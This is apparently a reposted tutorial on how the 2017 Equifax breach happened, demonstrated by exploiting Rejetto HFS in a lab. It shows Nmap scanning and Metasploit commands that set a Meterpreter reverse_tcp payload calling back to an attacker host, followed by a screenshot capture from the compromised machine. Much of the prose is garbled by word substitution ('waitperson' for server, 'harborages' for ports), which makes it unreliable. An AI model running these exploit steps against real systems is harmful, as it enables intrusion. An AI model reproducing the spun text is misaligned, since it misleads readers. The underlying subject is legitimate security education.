The Equifax data breach affected nearly half of the U.S. population. In this affair of Cyber Work Applied with Infosec lead Security investigator Keatron Evans, see how the attack was carried out.
How did Equifax’s breach happen?
The Equifax data breach was one of the most destructive hacks in the old multitudinous generations. In this circumstance of Cyber Work Applied, Keatron Evans explains how the breach came down.
What was the Equifax vulnerability?
Equifax, the largest credit reporting agency and one of the largest natural intel databases in the world, was beggared when a hacker discovered that there was an unpatched rendition of Apache Struts software running on a waitperson in their DMZ, facing the internet.
What makes this significant is that during the congressional sound that followed this breach, it was revealed that penetration testers had actually begin this vulnerability months afore.Also Read:The Rise of MBR Ransomware-by Blackhat Pakistan 2023
As for their authorized report, the breach came down inmid- May of 2017. There subsisted actually a patch accessible for this defenselessness in March. That means two months passed after they knew they were sensitive and did nothing to fix it.
What you will see in this demonstration is that this hack is not authentically hairy to pull off. As a matter of fact, we might indeed say it’s beginner or apprentice- degree hacking. Let’s offspring started.
Scanning target using Nmap
Nmap (Network Mapper) is a free and open-source tool that is used for network exploration, management, and security auditing. It can be used to scan a target network to identify the hosts and services that are running on it. Nmap can perform various types of scans, such as ping scans, port scans, and version detection scans, to gather information about the target network. The results of an Nmap scan can be used to identify vulnerabilities in the network and to plan network security measures.
Now, this is just a straight Nmap examination. This is what we’d use if you were scrutinizing a confidentially available or a public- facing waiter. That check simply shows me what harborages are open or which harbors are accepting connections on that waiter or on that IP.
Related article:IPL Bootkits :Rovnix and Carberp-by Blackhat Pakistan 2023
What we’d do next is dig a little deeper and find out what the real service account is that’s running on each one of these individual havens. We ’re going to fasten on anchorage 8081. Okay. So, I repeat that audit, but I hamper it down to just that harbor and give it a flag sV.
This is generally my way of telling the Nmap tool to do a account delving, which means it’s going to dig into that service, get feedback from that service and figure out what account that service is — grounded on what the service responds with.
So we go ahead and run that. And as you can see far, Nmap comes back and tells us that like, hey, it’s running this particular rendition of that service.
How to find vulnerabilities to exploit
Now, we ’re going to simply go out to the internet, just regular old Google nowadays, and search for vulnerabilities related to that service. We can assuredly see that there are several exploits out there for that specific reading of that service. And it’s all related to the waitperson name Rejetto, which gives us else information.
So now I ’m going to go right back into my exploit tool nowadays, which is Kali, and I ’m going to search for exploits related to Rejetto
Now, additionally, in the factual Metasploit database, I can actually just search for that as well, andnd it ’ll come back with results to show me that this particular exploit configuration has exploits for that service.
Once that comes back, all that’s left wing for me to do is simply burden that exploit and either see if it works against that service. And let’s go ahead and do that.
Using an exploit via Kali Linux
So, with all these things in place, all that’s left for me to do is simply launch the exploit to see if the service is indeed vulnerable. So, I go ahead and run it.
msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > set lhost 192.168.248.251
lhost => 192.168.248.251
msf exploit(windows/http/rejetto_hfs_exec) > set rhost 192.168.248.246
rhost => 192.168.248.246
msf exploit(windows/http/rejetto_hfs_exec) > set rport 8081
rport => 8081
Gaining Access to the System
And as you can see, what happens there’s I get ago a session — and that session release there really means that I ’ve fully compromised a complex and I’ve control of it. To document that, I’ll simply take a screenshot.
Meterpreter > screenshot
And if we now do and view that image that was just redeemed locally to our machine, what you ’ll see is that it honestly is indeed a screenshot of what’s on that prey’s machine that we just gambled
[email protected]:~# firefox /root/r2YFTVhv.jpeg
How Equifax was compromised
This is exactly what betided with Equifax. They had a liable piece of software like this care and facing the internet. It got ascertained in a regular penetration test, and they opted not to fix it.
As you can fantasize, what ended up coming about is, of course, a bad hacker came on, set up the same vulnerability and capitalized it just like I exploited this weakness. And they had controller of that Equifax waitperson, moved horizontally out Equifax, and also it’s record as we know it from that point.